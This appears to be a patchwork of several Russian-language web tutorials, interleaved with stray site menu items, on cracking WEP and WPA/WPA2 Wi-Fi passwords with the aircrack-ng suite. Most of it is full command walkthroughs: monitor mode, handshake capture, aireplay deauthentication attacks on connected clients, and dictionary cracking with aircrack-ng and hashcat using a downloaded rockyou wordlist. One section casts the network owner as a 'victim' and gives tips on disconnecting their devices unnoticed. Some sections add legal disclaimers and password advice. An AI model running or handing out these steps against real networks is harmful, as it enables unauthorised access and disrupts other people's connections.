Как работать с программой aircrack ng


Aircrack-ng

Aircrack-ng - это программа взлома ключей 802.11 WEP и WPA-PSK, которая может восстанавливать ключи после того, как были захвачены достаточное количество пакетов данных. Он реализует стандартную атаку FMS наряду с некоторыми оптимизациями, такими как атаки KoreK, а также все новые атаки PTW, тем самым делая атаку намного быстрее по сравнению с другими инструментами взлома WEP.

aircrack-ng - программа для взлома ключей 802.11 WEP и WPA / WPA2-PSK

[email protected]:~# aircrack-ng --help Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org usage: aircrack-ng [опции] Общие параметры: -a       : принудительный режим атаки (1 / WEP, 2 / WPA-PSK) -e       : выбор цели: сетевой идентификатор -b       : выбор цели : MAC-адрес точки доступа -p       : # используемого процессора (по умолчанию: все процессоры) -q              : включить тихий режим (нет вывода состояния) -C        : объединить данные точки доступа в виртуальный -l        : записать ключ в файл. Статические параметры взлома WEP: -c              : поиск только буквенно-цифровых символов -t              : поиск двоично-кодированного десятичного chr только -h              : поиск цифрового ключа для Fritz! BOX -d        : использование маскировки ключа (A1: XX: CF: YY) -m       : MAC-адрес для фильтрации используемых пакетов -n       : длина ключа WEP: 64/128/152/256/512 -i       : индекс ключа WEP (от 1 до 4), по умолчанию: any -f       : коэффициент fudge фактора bruteforce, по умолчанию : 2 -k       : отключить один метод атаки (от 1 до 17) -x or -x0       : отключить bruteforce для последних keybytes -x1             : последний keybyte bruteforcing (по умолчанию) -x2             : включить последние 2 keybytes bruteforcing -X              : отключить bruteforce многопоточность -y              : экспериментальный режим одиночной грубой силы -K              : используйте только старые атаки KoreK (pre-PTW) -s              : покажите ключ в ASCII во время взлома -M         : укажите максимальное количество IV для использования -D              : WEP decloak, пропуски сломанные нажатия клавиш -P         : отладка PTW: 1: отключить Klein, 2: PTW -1              : запустить только 1 попытку взломать ключ wep и wpa-psk варианты взлома: -w       : путь к списку слов, имен файла Параметры WPA-PSK: -E        : создать файл проекта -J        : создать файл захвата Hashcat -S              : тест скорости взлома WPA -r          : путь к базе данных airolib-ng                   (не может использоваться с -w) Другие параметры: -u              : отображает # из процессоров и поддержку MMX / SSE --help          : отображает этот экран использования

Примеры использования aircrack-ng

Режим Wordlist WPA

Укажите список слов для использования ( -w /usr/share/doc/aircrack-ng/examples/password.lst ) и путь к файлу захвата ( /root/wpa.cap ), содержащий хотя бы одно рукопожатие с четырьмя способами.

root @ kali: ~ # aircrack-ng -w /usr/share/doc/aircrack-ng/examples/password.lst/root/wpa.cap                         Aircrack-ng 1.2 rc4 [00:00:00] Проверено 232/233 ключа (1992.58 k / s) Оставшееся время: 0 секунд 99.57%                            KEY FOUND! [biscotte] Master Key: CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6           39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE Переходный ключ: 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49                  73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08                  AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97                  D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD EAPOL HMAC: 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45

Базовый WEP-крекинг

Чтобы aircrack-ng проводил базовую атаку ключа WEP в файле захвата, передайте ему имя файла в формате .ivs или .cap / .pcap.

root @ kali: ~ # aircrack-ng all-ivs.ivs                           Aircrack-ng 1.2 rc4        [00:00:00] Протестировано 1514 ключей (получено 30566 IVs) Кбайт глубины байт (голос) 0 0/9 1F (39680) 4E ( 38400) 14 (37376) 5C (37376) 9D (37376) 1 7/9 64 (36608) 3E (36352) 34 (36096) 46 (36096) BA (36096) 2 0/1 1F (46592) 6E (38400) 81 (37376) 79 (36864) AD (36864) 3 0/3 1F (40960) 15 (38656) 7B (38400) BB (37888) 5C (37632) 4 0/7 1F (39168) 23 (38144) 97 ( 37120) 59 (36608) 13 (36352)                    KEY НАЙДЕНО ! [1F: 1F: 1F: 1F: 1F] Дешифровано правильно: 100%

kalinux.info

Инструкции для работы с aircrack oc windows. Атака на беспроводные сети. Чуть меньше теории и чуть больше практики

  • Мебель
  • Отделка
  • Гостинная
  • Обои
  • Спальня

4. Неприступный WPA/WPA2
В этом случае все выглядит намного проще, но к конечному результату прийти намного сложнее.

Для начала, как обычно, запускаем airodump нацеленный на выбранную сеть… В случае с WPA/WPA2 сбор пакетов не срабатывает, чтобы сдвинуться с места нам нужен клиент подключенный к сети, а если говорить еще точнее, нам надо застать момент подключения клиента к сети. Если клиента нету, то сидим и ждем...

Если клиент уже подключен, запускаем aireplay и обрываем его аутентификацию, тем самым заставляя его соединиться заново:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 где:-a 00:14:6C:7E:40:80 - MAC точки доступа-c 00:0F:B5:FD:FB:C2 - MAC клиента

И на выходе получаем:

11:09:28 Sending DeAuth to station -- STMAC: В идеале мы должны получить т.н. handshake, о чем нас опять же уведомит airodump, отобразив в самой верхней строке справа сообщение «WPA handshake: 00:14:6C:7E:40:80» . Если этого не произошло, снова используем aireplay.

Когда handshake пойман, запускаем aircrack, но на этот раз с использованием словаря:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap В данном случае результат напрямую зависит от наличия нужного пароля в нашем словаре, поэтому наши шансы прямо пропорциональны размеру и качеству нашего словаря...

Словари можно без проблем найти на просторах интернета, плюс в архиве aircrack-ng уже небольшой лежит:)

5. Пару слов про защиту
Несколько советов для тех кто категорически не хочет пускать посторонних к своей кормушке:
  • не использовать WEP, и полностью переходить на WPA2 и более совершенные протоколы и надстройки над ними
  • не использовать минимально допустимый пароль, чем длиннее тем лучше
  • использовать уникальный пароль, заглавные и строчные буквы…
  • никаких дат (например все даты формата ДДММГГГГ с 01.01.1950 по 01.01.2010 перебираются за минуту)
  • использовать SSID Cloaking и MAC Filtering, хоть немножно, но поможет
6. Заключение
Вот вроде бы и все… Это были самые простейшие способы обойти и усилить защиту, но даже они не всегда срабатывают.

Для тех кто хочет узнать больше, советую посетить сайт

В наши дни беспроводные сети используются все чаще и чаще, уже в каждом доме где есть интернет, есть и роутер для раздачи Wifi на мобильные устройства и другие гаджеты. Интернет и Wifi стали неотъемлемой частью нашей жизни. Но остался вопрос о безопасности таких сетей. Как показывает история люди всегда находили способы взломать сети, и прекрасное тому подтверждение — протокол WEP, который поддавался взлому буквально за несколько минут, даже при отсутствии подключенных к сети пользователей.

Но, похоже, достучались, люди все реже используют WEP и защищают свои сети с помощью более современных стандартов таких как WPA и WPA2. Но действительно ли они безоговорочно безопасны? В этой статье мы рассмотрим как пользоваться утилитой Aircrack-ng для тестирования безопасности сетей WPA и WPA2. Вы увидите в чем их слабое место и узнаете как защитить себя от взлома.

Что такое Aircrack-ng?

Aircrack-ng — это набор утилит для тестирования безопасности Wifi сетей. Он был разработан группой специалистов с информационной безопасности и в него входят несколько утилит для сканирования сети, передачи пакетов в сеть, настройки интерфейса и непосредственно, перебора пароля. Программы поддерживают взлом WPA, так и WEP сетей.

В пакет Aircrak входит большое количество утилит, но мы рассмотрим только самые основные:

  • airodump-ng — сканирование сети и захват пакетов которые были отправлены в эфир;
  • airmon-ng — переключение сетевого интерфейса в режим мониторинга для приема всех пакетов, которые есть в сети;
  • wesside-ng — утилита для автоматического взлома WEP использует атаку типа PTW;
  • easside-ng — утилита для автоматического взлома WEP с помощью перебора ключа на основе векторов инициализации;
  • besside-ng — автоматический взлом сетей WEP и перехват handshake для WPA;
  • airolib-ng — утилита для управления списком точек доступа и паролей;
  • airbase-ng — универсальная утилита для выполнения различных атак на сети Wifi, находится в разработке;
  • tkiptun-ng — утилита для взлома WPA TKIP;
  • airdecap-ng — утилита для расшифровки перехваченного трафика, работает только при наличии ключа;
  • airdrop-ng — выполняет деаутентификацию пользователей;
  • aireplay-ng — позволяет генерировать трафик внутри Wifi сети.

В этой статье мы будем использовать только некоторые из этих утилит. А именно airodump, airmon, aircrhack и besside для попытки автоматического взлома.

Как будет работать атака на WPA/WPA2?

Как я уже говорил протокол шифрования беспроводных сетей WPA тоже имеет свои недочеты. Но большинство из них усугубляет именно пользователь. Если не учитывать недавно открытую уязвимость в работе WPA TKIP, то все остальные проблемы возникают из-за слабого пароля.

Для нашей тестовой атаки будем использовать собственную сеть. Предполагается, что вы к ней не подключены. Рассмотрим в чем состоит суть атаки. Для того чтобы подключиться к сети каждый клиент должен пройти процесс аутентификации с роутером. Я не буду вдаваться в подробности, но между клиентом и маршрутизатором выполняются четыре проверки подлинности на основе MAC адреса, ключа и случайных чисел, если мы их перехватим, то сможем уже на локальном компьютере попробовать перебрать подходящий пароль уже на локальном компьютере.

Суть метода в том, что скорость перебора на компьютере будет намного быстрее, чем при ручной проверке, она будет достигать до 1000 паролей в секунду, а при использовании очень простого и ожидаемого пароля, его можно очень быстро перебрать.

Сначала мы переведем устройство в режим монитора с помощью airmon-ng, затем будем перехватывать все пакеты от этой сети с помощью airodump-ng пока не найдем рукопожатие, затем останется перебрать пароль по словарю с помощью aircrack. А теперь перейдем ближе к практике и рассмотрим насколько просто перебрать ваш пароль если он достаточно простой.

Как пользоваться Aircrack-ng для взлома WPA

sudo apt install aircrack-ng

А в Red Hat / CentOS:

sudo yum install aircrack-ng

Windows вам придется загрузить установщик из официального сайта. После установки первым делом нужно сделать чтобы нам ничего не мешало. Для этого отключите все сервисы, которые управляют Wifi и тем более отключитесь от Wifi сети, если вы к ней подключены. Если запущен NetworkManager, его нужно отключить:

sudo systemctl stop NetworkManager

Я предполагаю, что у вас уже установлены все необходимые драйвера и вы готовы к работе. Сначала смотрим подключенные к системе интерфейсы:

sudo ls /sys/class/net/

Обычно имя беспроводного интерфейса начинается на w, например, wlp3s0 или wlan0. У меня это wlp3s0b1. Нам нужно перевести сетевой интерфейс WiFi в режим мониторинга. В этом режиме он может захватывать все пакеты, которые летают в сети и даже если ему они не адресованы ему. Вообще, интерфейс и так захватывает все пакеты, но на программном уровне все пакеты, которые не адресованы этому компьютеру отсеиваются, теперь они не будут отсеиваться. Дальше идет инструкция Aircrack-ng.

Для этого воспользуемся утилитой airmon-ng. Ей нужно передать команду start и имя интерфейса:

sudo airmon-ng start wlp0s0b1

После этого будет создан виртуальный интерфейс, который работает в режиме монитора во второй колонке отображено его имя, у меня это wlp3s0b1mon, хотя часто он называется просто mon0. Если какие-либо программы будут мешать программа выдаст их имена и PID:

Их нужно завершить с помощью kill. Дальше нам нужно просканировать эфир и найти нашу сеть, которую мы собираемся тестировать. Для этого используйте команду airodump-ng. В параметрах ей нужно передать только интерфейс. Обратите внимание, что нужно передавать именно виртуальный интерфейс, который работает в режиме монитора:

sudo airodump-ng -i wlp3s0b1mon

Почти сразу же вы увидите свою сеть, поскольку она расположена ближе всех. У меня это MyPublicWifi423. Из предоставляемой информации нам понадобится ее BSSID и канал, который можно найти в колонке CH. Дальше мы будем использовать ту же самую утилиту, только теперь нацелим ее именно на нашу сеть, чтобы она не отвлекалась на посторонние и поймала все что нам нужно.

Мы зададим канал с помощью опции -с и BSSID роутера с помощью опции —bssid, а также укажем с помощью опции -w куда нужно сохранить перехваченные пакеты для дальнейшей обработки:

sudo airodump-ng -c 11 --bssid 56:0A:64:17:5D:33 -w /home/sergiy/hack.pcap wlp3s0b1mon

Не закрывайте этот терминал, сейчас выполняется захват и как вы можете видеть к нашей сети подключено два пользователя. Их MAC адреса находятся в колонке STATION. Если сейчас один из них отключится и еще раз подключится, то мы получим необходимые для дальнейшего взлома данные.

Мы можем это сделать со своими устройствами, но в реальной сети у хакера не будет такой возможности, поэтому мы можем принудительно отключить клиента от сети с помощью утилиты aireplay. Если передать ей опцию deauth, то она разошлет широковещательное сообщение от имени маршрутизатора, в котором попросит всех отключиться от сети. Нам нужно только передать в параметрах количество пакетов, которые нужно отправить и BSSID роутера:

sudo aireplay-ng --deauth 10 -a 56:0A:64:17:5D:33 wlp3s0b1mon

Сразу после этого вы сразу же увидите, сообщение WPA handshake: 56:0A:64:17:5D:33 в правом верхнем углу терминала. Вы можете использовать и более простой способ для получения Handshake. Утилита besside позволяет выполнить все действия автоматически нужно только передать BSSID роутера и интерфейс монитора:

sudo besside-ng -b 02:C2:C6:46:39:85 wlp3s0b1mon

Этап, связанный с работой в реальной сети завершен и нам осталось только перебрать все возможные пароли по словарю. Дальше рассмотрим как пользоваться Aircrack-ng для перебора паролей.

Словарь — это обычный текстовый документ со списком возможных паролей. Вы можете составить его сами. Команда будет выглядеть следующим образом:

$ sudo aircrack-ng -b BSSID_маршрутизатора -w путь_к_словарю перехваченные_пакеты

sudo aircrack-ng --bssid 56:0A:64:17:5D:33 -w /home/sergiy/words /home/sergiy/hack.pcap-01.cap

Как видите, aircrack-ng wpa2 psk достаточно быстро может быть взломан. Скорость перебора паролей достигает тысячи вариантов в секунду, а это значит, что на перебор до 100000 паролей уйдет всего только несколько минут. И это на обычном, бюджетном ноутбуке. На более мощном железе использовать Aircrack-ng будет намного быстрее.

Поэтому никогда не используйте простые пароли, состоящие только из цифр, если вы добавите хоть одну букву или символ, то уменьшите шансы на взлом в несколько раз.

Выводы

В этой статье мы рассмотрели как пользоваться программой aircrack-ng для взлома WPA и WPA2 сетей. Помните что взлом чужих систем — это преступление, за которое можно понести уголовную ответственность, поэтому используйте все выше описанные методы только для тестирования своих сетей. Эта инструкция aircrack ng предназначена только для ознакомления, для того чтобы пользователи смогли понять насколько опасно применять простые пароли.

Рассмотрим aircrack-ng - лучшее программное обеспечение в мире для взлома Wi-Fi, и начнем с некоторых основ о том, что включено и как все это использовать.

Прежде всего, aircrack-ng - не просто инструмент, а скорее набор инструментов для редактирования и взлома сетей Wi-Fi. В этом наборе есть инструмент под названием aircrack для взлома паролей, но, чтобы добраться до взлома, нам нужно сделать несколько шагов с помощью других инструментов. Кроме того, aircrack-ng способен выполнять DOS-атаки и многое другое.

Итак, давайте начнем с набора aircrack-ng!

Краткое примечание

ng означает «новое поколение», поэтому aircrack-ng заменяет старый набор aircrack, который больше не поддерживается.

Шаг 1: Iwconfig

Перед тем, как начать работу с aircrack-ng, мы должны убедиться, что BackTrack определяет беспроводной адаптер. Мы можем сделать это в любой Linux-системе, введя:

· bt > iwconfig

Мы видим, что BackTrack определил беспроводную карту USB автора, и он говорит, что карта поддерживает 802.11bgn, что ESSID выключен, что она находится в режиме управления и т.д.

Хорошо, теперь мы готовы, чтобы начать использовать aircrack-ng.

Шаг 2: Airmon-Ng

Первый инструмент, который мы рассмотрим и который почти никогда не требует хака WiFi, это airmon-ng, который переводит нашу беспроводную карту в неразборчивый режим (ред.: режим мониторинга). Да, это означает, что наша беспроводная карта подключена к любому!

Ну, это почти правильно. Когда наша сетевая карта в режиме мониторинга, то это означает, что она может видеть и получать весь сетевой трафик. Как правило, сетевые карты получают только пакеты, предназначенные для них (которые определяются МАС-адресом сетевого адаптера), но с помощью airmon-ng она будет получать весь беспроводной трафик, независимо предназначен он для нас или нет.

Мы можем запустить этот инструмент, введя airmon-ng, action (start/stop), а затем interface (mon0):

· bt > airmon-ng start wlan1

Airmon-ng предоставляет некоторую ключевую информацию о нашем беспроводном адапторе с чипсетом и драйвером. Самое главное, обратите внимание, что он изменил обозначения нашего беспроводного адаптера с wlan1 на mon0.

Шаг 3: Airodump-Ng

Следующий инструмент в наборе aircrack-ng, который мы должны будем использовать, airodump-ng, который позволяет перехватывать пакеты нашей спецификации. Это особенно полезно при взломе паролей.

Мы активируем инструмент вводом команды airodump-ng и переименовав интерфейс мониторинга (mon0):

· bt >airodump-ng mon0

Как видно на скриншоте выше, airodump-ng отображает все AP (точки доступа) в пределах диапазона с их BSSID (MAC-адресам), их мощность, количество кадров сигнала, количество пакетов данных, канал, скорость, метод шифрования, тип используемого шифра, использованный метод проверки подлинности и, наконец, ESSID.

Для наших целей взлома WiFi важнейшими полями будут BSSID и канал.

Шаг 4: Aircrack-Ng

Aircrack-ng является основным приложением из набора aircrack-ng, который используется для взлома паролей. Он способен сломать WEP с использованием статистических методов и взламывать WPA и WPA2 по словарю после захвата рукопожатия WPA.

Шаг 5: Aireplay-Ng

Aireplay-ng - еще один мощный инструмент в нашем арсенале aircrack-ng, и он может быть использован для генерации или ускорения трафика точки доступа. Это особенно полезным может быть в таких атаках, как атаки deauth, когда ударяют на все точки доступа, атаки на пароль WEP и WPA2, а также для ARP-инъекций и атак воспроизведения.

Aireplay-ng может получить пакеты из двух источников:

    Прямой поток (трансляция) пакетов или

    Предварительно захваченные и сохраненные в pcap-файле

Pcap-файл является стандартным типом файла, связанным с инструментами захвата пакетов такими, как libpcap и winpcap. Если Вы когда-либо использовали Wireshark, то, скорее всего, работали с pcap-файлами.

Aircrack — лучшая по производительности и качеству работы программа, используемая для взлома Wi-Fi. Вопрос: “как пользоваться Aircrack?”, интересует всё больше людей из круга обычных пользователей. При всех её достоинствах, Aircrack-ng портирована на множество различных платформ — таких, как Zaurus, Maemo и, что особенно радует пользователей iPhone. А среди поддерживаемых операционных систем, наиболее популярные: UNIX, Mac OS X, Linux и Windows.

У достаточно большого количества пользователей возникают определённые проблемы с использованием Aircrack, по этой причине и было принято решение написать руководство о взломщике. Хотя в действительности пользоваться Aircrack совсем не трудно, единственной сложностью можно считать достаточно большой англоязычный интерфейс.

Как использовать программу Aircrack

Сейчас используются два основных метода шифрования для Wi-fi: WPA и WEP .

Если сетка, которая вам попалась, имеет метод шифрования WEP (более «устаревающий»), то вы сможете взломать её практически наверняка! Только сигнал, желательно, должен быть мощности хотя бы выше средней (иначе процесс будет неоправданно долгим).

Суть взлома с помощью Aircrack заключается в следующем:

  • Сначала необходимо «наловить» достаточно много пакетов, содержащих ivs-ключ. Конкретнее — их потребуется никак не меньше 10000. Лучше — больше (с 20000 взлом WEP почти гарантирован).
  • Чтобы определить пароль, полученные в файле дампа ключи нужно будет запустить в Aircrack на перебор. Делать это следует так (для примера разберём версию GUI).
  • Ищем в архиве программы файл Aircrack-ng GUI и запускаем её.
  • Откроется основное окно программы. Ищем в строке filenames путь до дампа с сохранёнными ключами.
  • Чуть ниже указываем программе, что в этом дампе пароль зашифрован с помощью метода WEP. Определяем длину ключа в 128 или в 64 (может быть, придётся попробовать разные варианты — если пароль не найдётся при 64, можно будет попытаться при 128).
  • Ячейка USE WORDLIST нужна для того, чтобы искать по словарю, там галочку ставить не надо. А вот USE PTW attack — перебор по всем возможным знакам. Здесь и ставим галочку, после чего нажимаем LAUNCH.
  • Появится командная строка, в ней нужно будет выбрать имя сетки для взлома и поставить цифру от 1 до 4 — в зависимости от того, под каким номером эта программа определила имя вашей сетки из данного дампа. В том случае, если все параметры будут поставлены правильно, успешно запустится перебор.

Он, как правило, продолжается около 2 минут. Если в дампе удалось собрать достаточно ivs ключей, то вы получите пароль, только не в виде «чистого» набора символов, а с двоеточиями. Например, так: «01:19:42:24:58 «. В таком случае настоящий пароль — 0119422458.

Лаборатория стиля - уют вашего дома

labrys.ru

Взлом WiFi при помощи airodump – ng . Часть вторая.

Взлом WiFi при помощи airodump – ng .

Продолжаем доламывать начатое. В предыдущей статье хакер подобрался вплотную к расшифровке пароля беспроводной точки доступа жертвы. Посмотрим, как в дешифрировании будет работать программа airodump-ng .

CРАЗУ ПРО НЮАНСЫ. 

Укажу только одно слово – словари. Это место – самое уязвимое в методике взлома пароля доступа по методу брутфорс. Подробности в ссылке.

Указанные программы также вшиты в сборку Кали Линукс , если используете другую версию Линукса, придётся обратиться к репозиториям. Скачать обновлённые версии программ труда не составит.

Как я указывал в предыдущей статье, заветная мечта хакера в случае с попыткой присовокупиться к точке доступа жертвы на данном этапе – результативная работа утилиты airodump-ng . Запущенная через команду в терминале против mac адреса жертвы (на моём конкретном примере):

airodump-ng --channel 1 --bssid 28:10:7B:EC:6A:3E -w 22 wlan0mon

терминал, опять же, выведет окно:

и далее

Обратите внимание, нижняя часть интерфейса утилиты (см. по стрелочке на рисунке) содержит в себе 2 строки, из которых следует, что в данный момент к беспроводной точке доступа жертвы подключены два устройства. Что это: смартфоны, планшеты или ноутбук, нам неизвестно, да и незачем.. Но airodump-ng показывает нам их mac адреса. Это-то хакеру и нужно.

Взлом WiFi при помощи airodump – ng. Перехват.

Всё, что теперь необходимо взломщику – терпение (70%) и удача (30%). Основное условие на этом этапе – находиться поблизости от роутера жертвы, так как придётся “немного обмануть” одно из устройств жертвы без его, само собой, согласия. Чуть ниже объясню, почему это важно. Этот процесс называется деидентификация.

Утилита запущена, но всматриваться в окно терминала смысла пока нет.

заветное поле пусто…

А теперь ключевой момент – нужно ждать появления в верхней строке утилиты записи:

WPA handshake: mac адрес-жертвы

Ждать очень часто приходится долго. Количество пакетов должно быть достаточным, но самое главное это именно вот такой результат:

Это и есть промежуточная (но не конечная) цель проекта.

Не получается?

Рассмотрим типичные проблемы (об этом знают лучше сами изобретатели утилиты, я расскажу про известные мне).

Окно терминала перехвата пакетов не выключать до появления WPA handshake !

Все дополнительные команды вводятся в новом окне терминала!

  • Запущенной airodump мешают некоторые запущенные службы в самой кали линукс . Их список появляется на одном из этапов взлома при запуске утилиты перевода модема в режим мониторинга (см. статью Перехват пакетов), причём на список этих служб можно взглянуть, не отходя от кассы. Откройте ещё одно окно терминала и наберите уже известную команду
airmon-ng start wlan0

Утилита выведет список служб на экран. Самая “вредная” в нашем случае, это сетевая служба. Она иногда любит изменять режим работы модема на своё усмотрение. В списке первая с соответствующим числовым идентификатором. Остановим процесс командой (его номер будет постоянно меняться):

kill 2520

Если не получается и после, остановите остальные.

  • Отсутствие подключённых к ТД жертвы устройств. Это главная причина неудачи. Что перехватывать-то? Устройства должны общаться… Есть вариант поймать и без них (клиентов), но не в нашем случае.
  • Компьютер хакера далеко от передатчика жертвы. Вследствие слабого сигнала наблюдаются большие потери в качестве принимаемых данных. Подбирать ТД нужно поближе. Как это узнать? Столбец PWR при выборе атакуемых точек доступа и статья Снифер airodump в кали линукс хакеру в помощь.
  • Хакер не должен использовать другое беспроводное соединение на своём же компьютере. Некоторые умудряются использовать тот же канал, что роутер атакуемого… О какой чистоте эксперимента может идти речь?
  • Чтобы взлом WiFi при помощи airodump проходил удачно, а сниферу не приходилось терять большое количество важных пакетов, иногда приходится просто перемещаться в пространстве с целью угадать оптимальное расстояние и угол приёма сигналов роутера жертвы. Это только в учебнике волны распространяются равномерно в пространстве…
  • Используя метод деидентификации устройства, не перегружайте канал связи множеством пакетов на отключение устройства-клиента.
  • Идеальный вариант перехвата WPA handshake – МОМЕНТ ПОДКЛЮЧЕНИЯ к точке доступа устройства-клиента (жертва включила ноутбук, планшет, смартфон). И вот последние два пункта позволят хакеру успешно справиться с поставленной задачей. Чтобы не загромождать эту статью, выделю объяснение работы отдельно в заметку Как отключить от WIFI неприятеля с помощью кали линукс . А сейчас просто повторите команду из следующего абзаца в новом окне терминала.

 Взлом WiFi при помощи airodump – ng . Как это работает на примере?

Вся суть работы деидентификатора в следующей команде (опять же применимо к моему случаю, открывается в новом окне терминала; обратите внимание,что mac адреса роутера и клиента жертвы в этом примере уже другие и взяты из следующей статьи):

aireplay-ng -0 1 -a 04:A1:51:5A:61:CD -c 00:08:22:08:52:1D wlan0mon

где

aireplay-ng – сама утилита

-0 – “ноль” – команда на прерывание соединения клиента (смартфоном или чем там…) по принципу “я отключаюсь”; следующее за ним число – количество прерываний (то есть в нашем случае один (1) раз). Чем оно меньше, тем менее заметно будет отключение для жертвы, одновременно заставляя смартфон повторно запросить доступ к своему роутеру, передавая в числе прочего ключ доступа – а хакер тут как тут!). Лучший способ – повторно, с течением времени вводить команду деидентификации с числом прерываний 1 или 2. Ключ обязательно себя проявит.

-a – mac адрес точки доступа

-c – mac адрес одного из подключённых устройств (клиента)

wlan0mon – карта хакера.

Итак, WPA handshake на месте, четыре файла в указанной вами папке или папке по умолчанию (в Домашней). Выведем список файлов на экран. В новом окне терминала откройте список сохранённых файлов командой ls . Ключ в файле под названием имя-файла.cap (у меня 22-01.cap, если вы помните по предыдущей статье) в папке root (по умолчанию):

тут же введите команду:

aircrack-ng /root/22-01.cap

где

aircrack-ng – команда подбора паролей

/root/22-01.cap – путь к файлу с ключом (у вас может быть другим). Жмём ввод.

Возможно сейчас вас встретит ошибка

Please specify a dictionary (option -w)

Она означает, что версия aircrack-ng в вашей кали своего словаря не содержит, либо, при быстром окончании работы утилиты, с малым по объёму. Укажите к скачанному словарю путь на манер (если он сохранён, допустим, на Рабочем столе) более полной командой:

aircrack-ng /root/22-01.cap -w /root/Desktop/dic

где dic  – условное название словаря с парольными комбинациями.

Запускаем. Ждём… В зависимости от сложности пароля и производительности системы времени на взлом WiFi при помощи airodump потребуется немало. Теперь всё зависит от качества вашего словаря. Попейте чайку. Людям приходилось пить чаёк от 50 мин. до 500 часов, так что терпения вам и терпения:

Вот как это выглядит в идеале  взлом WiFi при помощи airodump и aircrack:

Однако никто, даже по истечении многих часов ожидания в предвкушении результата, не застрахован от того, что часы протекли напрасно и “парольная комбинация” в выбранном словаре не обнаружена.:

Что ж… Переходим к следующему варианту действий.

computer76.ru

Записки программиста

Из этой заметки вы узнаете, как можно подобрать пароль к Wi-Fi сети. Вообще-то говоря, меня лично куда сильнее интересует, как защититься от взлома, а не то, как можно что-то кому-то сломать. Но для построения нормальной защиты нужно понимать, как произвести атаку. Поэтому, об атаке далее и пойдет речь. Совершить же ее нам поможет набор утилит под названием aircrack-ng. Протокол WEP сейчас практически никем не используется, поэтому далее речь пойдет исключительно о протоколах WPA и WPA2.

Важно! Статья опубликована исключительно с целью информирования общественности о существующих угрозах. Я не призываю вас в каким бы то ни было действиям, а также не несу за них ответственности. Должен предупредить, что практически во всех странах неправомерный доступ к компьютерной информации является противоправным действием, предусматривающим ответственность вплоть до уголовной. Например, если вы живете в России, см главу 28 уголовного кодекса.

Итак, устанавливаем aircrack-ng:

sudo pacman -S aircrack-ng

Выше приведено название пакета для Arch Linux, но я почти уверен, что в других дистрибутивах он будет называться так же.

Проверяем, поддерживает ли сетевой интерфейс режим мониторинга:

Если список устройств не пустой (в нем есть wlp2s0 или что-то подобное), значит все хорошо. Иначе для повторения эксперимента придется поискать другой Wi-Fi адаптер на Яндекс.Маркете или eBay. Лично я использовал встроенный адаптер моего ноутбука.

Далее переводим устройство в режим мониторинга:

sudo airmon-ng start wlp2s0

Может появиться предупреждение вроде такого:

Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill'   PID Name   479 NetworkManager

  511 wpa_supplicant

Я лично просто его проигнорировал. Также вы должны увидеть что-то вроде:

mac80211 monitor mode vif enabled for [phy0]wlp2s0 on [phy0]wlp2s0mon

Следующим шагом ловим пакеты, собирая информацию о BSSID и номерах каналов ближайших сетей:

sudo airodump-ng wlp2s0mon

Мое внимание привлекла следующая сеть:

 CH  9 ][ Elapsed: 0 s ][ 2018-01-01 10:00  BSSID              PWR  [...]  CH  MB   ENC  CIPHER AUTH ESSID

 BE:EF:C0:FF:FE:42  -34  [...]   6  54e. WPA2 CCMP   PSK  hackme

Как не трудно догадаться, это моя собственная Wi-Fi точка, которую я временно переименовал, а также сменил пароль от нее, на время написания заметки. BSSID я на всякий случай заменил в тексте на вымышленный.

Начинаем собирать зашифрованные пакеты, передаваемые в сети:

mkdir temp sudo airodump-ng -c 6 --bssid 'BE:EF:C0:FF:FE:42' -w temp/ wlp2s0mon

Нужно дождаться появления строчки вроде такой:

CH  6 ][ Elapsed: 24 s ][ ... ][ WPA handshake: BE:EF:C0:FF:FE:42

Если «WPA handshake» долго не появляется, можно выбрать кого-нибудь из клиентов (колонка STATION в выводе airodump-ng) и в соседнем терминале порвать ему подключение к Wi-Fi точке:

sudo aireplay-ng -0 10 -a 'BE:EF:C0:FF:FE:42' \   -c '65:61:78:2E:6D:65' wlp2s0mon

В результате клиент переподключится и мы поймаем нужный нам хэндшейк. Как вы могли догадаться, в хэндшейке содержится хэш пароля от Wi-Fi точки. Для подбора пароля воспользуемся словарем под названием rockyou:

wget https://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 bzcat rockyou.txt.bz2 > rockyou.txt aircrack-ng -a2 -b 'BE:EF:C0:FF:FE:42' -w rockyou.txt temp/-01.cap

Перебор займет какое-то время, и, если пароль был в словаре, мы увидим его на экране:

                           Aircrack-ng 1.2 rc4 [00:00:00] 64/7120714 keys tested (2919.57 k/s) Time left: 40 minutes, 39 seconds                          0.00%                      KEY FOUND! [ spongebob ]

[...]

Здесь для демонстрационных целей я заранее выбрал пароль из начала словаря, поэтому он был подобран практически мгновенно. Перебор же всех паролей на моем ноутбуке занимает 40-45 минут.

Перебор можно ускорить, перенеся его с CPU на GPU с помощью утилиты hashcat. У меня, к сожалению, это не работает — возникает ошибка:

hashcat (v4.0.1) starting... clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

Видимо, негодный GPU. Но теоретически нужно просто сказать:

sudo pacman -S hashcat hashcat-utils cap2hccapx temp/-01.cap temp/-01.hccapx hashcat -m 2500 temp/-01.hccapx rockyou.txt

В нормальный режим работы сетевой интерфейс теоретически переводится следующей командой:

sudo airmon-ng stop wlp2s0

Но у меня это тоже не работает. Устройство так и остается в режиме мониторинга до следующей перезагрузки.

Fun fact! Взлом беспроводных сетей еще называют вардрайвингом (wardriving).

Такие дела. А доводилось ли вам экспериментировать со взломом и, соответственно, защитой Wi-Fi точек, и если да, то какие инструменты вы при этом использовали?

Дополнение: В контексте безопасности WiFi сетей вас также могут заинтересовать посты О публичном Wi-Fi, поддельных SSID’ах и sslstrip и Ставим прошивку OpenWrt на роутер TP-Link TL-WDR3600.

